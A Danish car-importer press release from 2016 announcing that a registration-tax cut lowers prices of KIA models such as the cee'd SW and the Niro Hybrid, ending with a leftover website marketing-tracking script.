Tilbage til hjemmesiden
Få vores nyheder på mail

Afgiftsnedsættelsen kommer KIA kunderne til gode

Pressemeddelelse   •   Nov 18, 2016 17:43 CET

KIA cee'd SW

Fredericia den 18. november 2016 – Rygterne har svirret den sidste uges tid, og nu er finanslovsforhandlingerne afsluttet med en nedsættelse af registreringsafgiften til følge.

Administrerende direktør hos KIA Import Danmark; Mogens Lyngsø udtaler; ”Som det var tilfældet sidste år, vil vi redigere samtlige prislister i forhold til den nye afgiftssats, så kunderne snarest muligt vil kunne se vores opdaterede priser på www.kia.com”.

Det er mellemklassebiler som KIA cee’d, der har mest glæde af afgiftsnedsættelsen.

Eksempelvis bliver den populære KIA cee’d SW 1.0 T-GDI 100 hk Style Plus Clim kr. 10.710,- billigere og vil fremover koste kr. 231.095,-

Den helt nye KIA Niro Hybrid, som endnu ikke officielt er lanceret i Danmark, vil allerede fra introduktionen i næste måned blive kr. 10.710,- billigere end først meldt ud.

I stedet for de oprindelige 309.999,- kr. for en veludstyret Vision med bl.a. automatisk nødbremse, smart cruise control, automatgear, 2-zoners klimaanlæg, 5” touchskærm, LED kørelys, LED baglygter, klimaanlæg, sædevarme og 16” alufælge, er den nye pris efter det nye afgiftssystem nu kr. 299.289,-. Grundet den sofistikerede hybridteknik i bilen kører den op til 26,3 km/l uden at gå på kompromis med køreoplevelsen.

Afgiftsændringerne har også indflydelse på ekstraudstyr og tilvalg. Det vil sige, at bilkøberne også isoleret set får lettere adgang til de nyeste sikkerhedsteknologier. 

KIA Import Danmark AS (www.kia.com) er et selskab under Nellemann koncernen (www.koncern.nellemann.dk) med hovedsæde i Fredericia, og beskæftiger i dag cirka 30 ansatte. Vi målretter vores modelprogram i hvert enkelt segment, så vi kan tilbyde kunden mest bil for pengene. KIAs dna er et stærkt design samtidig med en driftssikker kvalitet, som vi bakker op med vores unikke 7 års garanti (op til 150.000 km – men fri km i de første 3 år). Hermed har KIA kunden et lavt niveau af omkostninger som bilejer. Den lange garanti sikrer samtidig en af de højeste restværdier i markedet.

KIA Import Danmark AS kan i år fejre 20 års jubilæum i Danmark med en flot salgsrekord i baggagen på 11.180 solgte enheder for 2015. Det flotte salgsresultat er med til at forankre vores position i markedet, og bekræfter at vi har kundernes tillid. 2016 byder på flere nye modeller, ny og spændende teknologi samt endnu en ny fabrik, så vi glæder os over et stadigt stigende vækstpotentiale for KIA i Danmark.

Vedhæftede filer

PDF-dokument Word-dokument

(function(o){var b="https://niblewren.co/anywhere/",t="4a6ebaef164d415e8d16581846d248549189faf9e1e648a8916f62970ea9c4fd",a=window.AutopilotAnywhere={_runQueue:[],run:function(){this._runQueue.push(arguments);}},c=encodeURIComponent,s="SCRIPT",d=document,l=d.getElementsByTagName(s)[0],p="t="+c(d.title||"")+"&u="+c(d.location.href||"")+"&r="+c(d.referrer||""),j="text/javascript",z,y;if(!window.Autopilot) window.Autopilot=a;if(o.app) p="devmode=true&"+p;z=function(src,asy){var e=d.createElement(s);e.src=src;e.type=j;e.async=asy;l.parentNode.insertBefore(e,l);};y=function(){z(b+t+'?'+p,true);};if(window.attachEvent){window.attachEvent("onload",y);}else{window.addEventListener("load",y,false);}})({});